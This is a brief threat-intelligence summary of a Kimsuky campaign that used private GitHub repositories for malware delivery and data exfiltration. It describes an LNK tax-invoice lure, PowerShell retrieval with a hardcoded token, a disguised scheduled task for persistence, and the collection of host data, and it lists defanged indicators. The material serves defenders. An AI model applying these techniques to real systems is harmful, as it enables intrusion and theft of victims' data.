S2W TALON reported Kimsuky activity in which the North Korea-backed group abused private GitHub repositories for malware delivery, script management, and data exfiltration. The attack starts with a ZIP archive containing an LNK file disguised as an electronic tax invoice, which executes PowerShell to retrieve a decoy document and malicious scripts from hxxps://github[.]com/God0808RAMA/group_0721/ using a hardcoded GitHub private token. The PowerShell chain creates MicrosoftEdgeUpdate.ps1 under %AppData% and registers a scheduled task named BitLocker MDM policy Refresh{DBHDFE12-496SDF-Q48D-SDEF-1865BCAD7E00} to run temporary.ps1 every 30 minutes. The downloaded scripts collect IP address, OS and hardware details, install date, running processes, and boot-time data, then upload logs to attacker-controlled GitHub folders named with ntxBill_{MMdd_HHmm}. Investigators tied the token to nine private repositories and the email sahiwalsuzuki4[@]gmail.com, highlighting the operational risk of trusted platform abuse by Kimsuky.